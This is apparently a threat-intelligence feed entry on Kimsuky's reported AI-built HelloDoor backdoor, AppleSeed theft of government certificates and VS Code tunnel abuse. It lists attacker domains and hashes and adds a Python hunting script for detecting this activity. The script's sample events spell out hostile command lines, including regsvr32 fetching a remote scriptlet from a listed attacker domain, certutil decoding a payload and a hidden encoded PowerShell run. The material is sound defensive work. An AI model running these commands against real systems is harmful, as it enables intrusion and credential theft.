Kimsuky Group Leverages AI for Malware Targeting South Korean Government

Severity: High (Score: 75.5)

Sources: www.genians.co.kr, Securelist, Biz.Chosun, En.Yna.Co.Kr

Summary

The North Korean state-sponsored group Kimsuky is using generative AI to build malware aimed at South Korean government systems, according to a Kaspersky report published on May 14, 2026. The malware, named HelloDoor, is a Rust-based backdoor whose code carries signs of AI assistance, including emoji and grammatical errors in the source. Kimsuky has also adopted new tradecraft, notably abusing Visual Studio Code's remote tunneling feature to gain covert, persistent access to victim devices through legitimate Microsoft infrastructure.

The group's AppleSeed malware harvests Government Public Key Infrastructure (GPKI) certificates, the credentials used to authenticate to South Korean government systems. A stolen certificate would give the attacker the certificate owner's access to sensitive government accounts. Kaspersky's analysis indicates that military officials, government employees and telecom workers have been infected. The report stresses the need for improved detection coverage and updated threat intelligence to keep pace with these evolving techniques.

Key Points:

• Kimsuky is using AI to develop malware, including the HelloDoor backdoor.
• The group targets South Korean government officials' GPKI digital certificates via the AppleSeed malware.
• New attack methods include Visual Studio Code's remote tunneling feature, used to blend remote access into legitimate traffic and evade detection.

Key Entities

  • Apt43 (apt_group)
  • Black Banshee (apt_group)
  • Kimsuky (apt_group)
  • Lazarus Group (apt_group)
  • Ruby Sleet (apt_group)
  • Malware (attack_type)
  • Phishing (attack_type)
  • South Korean Government (company)
  • Cloudflare (company)
  • North Korea (country)
  • South Korea (country)
  • attach.docucloud.o-r.kr (domain)
  • cms.spaceyou.o-r.kr (domain)
  • dirwear.000webhostapp.com (domain)
  • download.uberlingen.com (domain)
  • erp.spaceme.p-e.kr (domain)
  • [email protected] (email)
  • Government (industry)
  • AppleSeed (malware)
  • BabyShark (malware)
  • HelloDoor (malware)
  • HttpMalice (malware)
  • PebbleDash (malware)
  • 07015af18cf8561866bc5b07e6f70d9a (md5)
  • 08160acf08fccecde7b34090db18b321 (md5)
  • 1ae2e46aac55e7f92c72b56b387bc945 (md5)
  • 2a388f3428a6d44a66f5cb0b210379a0 (md5)
  • 2f6fe22be1ed2a6ba42689747c9e18a0 (md5)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1059.001 - PowerShell (mitre_attack)
  • T1059.005 - Visual Basic (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • Windows (platform)
  • Visual Studio Code (platform)
  • Certutil (tool)
  • PowerShell (tool)
  • Regsvr32 (tool)
  • Regsvr32.exe (tool)
  • Rundll32.exe (tool)
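The tradecraft summarised above (VS Code tunnels for remote access, certutil, regsvr32, rundll32 and PowerShell as living-off-the-land tools, plus the listed domain and MD5 indicators) can be turned into a simple hunting rule over process-creation telemetry. The block below is an added example written for this page, not code from Genians, Kaspersky or the feed operator. The event records are constructed, the VS Code tunnel endpoint suffixes and the command-line heuristics are assumptions to validate against your own telemetry, and the indicator values are the ones listed in the Key Entities above.

```python
"""Hunt for Kimsuky-style tradecraft in process-creation logs.

Added example with constructed events; not data or code from the report.
"""
import re
from dataclasses import dataclass

# Indicators taken from the Key Entities list on this page.
IOC_DOMAINS = {
    "attach.docucloud.o-r.kr",
    "cms.spaceyou.o-r.kr",
    "dirwear.000webhostapp.com",
    "download.uberlingen.com",
    "erp.spaceme.p-e.kr",
}
IOC_MD5 = {
    "07015af18cf8561866bc5b07e6f70d9a",
    "08160acf08fccecde7b34090db18b321",
    "1ae2e46aac55e7f92c72b56b387bc945",
    "2a388f3428a6d44a66f5cb0b210379a0",
    "2f6fe22be1ed2a6ba42689747c9e18a0",
}

# Assumption: hostnames the VS Code tunnel client talks to. Verify against
# current Microsoft documentation and your own proxy logs before deploying.
TUNNEL_SUFFIXES = (".devtunnels.ms", ".tunnels.api.visualstudio.com")

# Directories a non-admin user can write to; LOLBins loading from here are suspicious.
USER_WRITABLE = re.compile(r"\\(users\\public|appdata|programdata|temp|tmp)\\", re.I)

# `code tunnel` (or `code.exe tunnel`) starts a remote tunnel session (T1021 via VS Code).
TUNNEL_CMD = re.compile(r'\bcode(\.exe|\.cmd)?"?\s+tunnel\b')


@dataclass
class Event:
    image: str            # full path of the created process
    cmdline: str          # command line as logged
    md5: str = ""         # hash of the image, if the sensor records it
    dest_host: str = ""   # hostname of a network connection made by the process


def classify(ev: Event) -> list:
    """Return the list of detection names that fire for one event."""
    hits = []
    exe = ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cl = ev.cmdline.lower()
    host = ev.dest_host.lower()

    if ev.md5.lower() in IOC_MD5:
        hits.append("ioc_md5")
    if host in IOC_DOMAINS:
        hits.append("ioc_domain")
    if host and host.endswith(TUNNEL_SUFFIXES):
        hits.append("vscode_tunnel_net")
    if TUNNEL_CMD.search(cl):
        hits.append("vscode_tunnel_cmd")
    # certutil used to decode a dropped payload or fetch one from a URL.
    if exe == "certutil.exe" and re.search(r"-(decode|urlcache)\b", cl):
        hits.append("certutil_lolbin")
    # regsvr32 pulling a remote scriptlet or registering a DLL from a user-writable path.
    if exe == "regsvr32.exe" and ("/i:http" in cl or "scrobj.dll" in cl or USER_WRITABLE.search(cl)):
        hits.append("regsvr32_lolbin")
    # rundll32 executing a DLL from a user-writable path.
    if exe == "rundll32.exe" and USER_WRITABLE.search(cl):
        hits.append("rundll32_lolbin")
    # PowerShell with encoded command, hidden window or execution-policy bypass (T1059.001).
    if exe in ("powershell.exe", "pwsh.exe") and re.search(
            r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden|bypass", cl):
        hits.append("powershell_suspicious")
    # Script hosts running VBScript (T1059.005).
    if exe in ("wscript.exe", "cscript.exe") and re.search(r"\.vb[se]?\b", cl):
        hits.append("vbscript_host")
    return hits


def hunt(events) -> dict:
    """Map event index -> detections, keeping only events that fired something."""
    out = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            out[i] = hits
    return out


# Constructed sample telemetry (not from the report): benign and suspicious mixed.
VSCODE = r"C:\Users\kim\AppData\Local\Programs\Microsoft VS Code\bin\code.exe"
SAMPLE_EVENTS = [
    Event(VSCODE, rf'"{VSCODE}" "C:\proj\tunnel"'),                                   # 0 benign folder open
    Event(VSCODE, rf'"{VSCODE}" tunnel --accept-server-license-terms --name desk-01'),  # 1 tunnel start
    Event(r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -decode C:\Users\Public\doc.txt C:\Users\Public\doc.dll"),   # 2 payload decode
    Event(r"C:\Windows\System32\regsvr32.exe",
          r"regsvr32.exe /s /n /u /i:http://attach.docucloud.o-r.kr/x.sct scrobj.dll",
          dest_host="attach.docucloud.o-r.kr"),                                        # 3 scriptlet + IOC domain
    Event(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\ProgramData\svc.dll,Run",
          md5="2f6fe22be1ed2a6ba42689747c9e18a0"),                                     # 4 IOC hash
    Event(r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\kim\notes.txt"),  # 5 benign
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -nop -w hidden -enc SQBFAFgA"),                             # 6 hidden encoded
    Event(VSCODE, rf'"{VSCODE}" tunnel', dest_host="global.rel.tunnels.api.visualstudio.com"),  # 7 tunnel C2
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].cmdline, "->", hits)
```

The hash and domain matches are exact and cheap; the command-line heuristics are what catch a fresh sample, and the tunnel checks matter most here because a `code tunnel` session rides signed Microsoft binaries and TLS to Microsoft-owned hosts, so neither the binary nor the destination looks malicious on its own. Tune the user-writable path list and the PowerShell pattern to your estate's baseline before alerting on them.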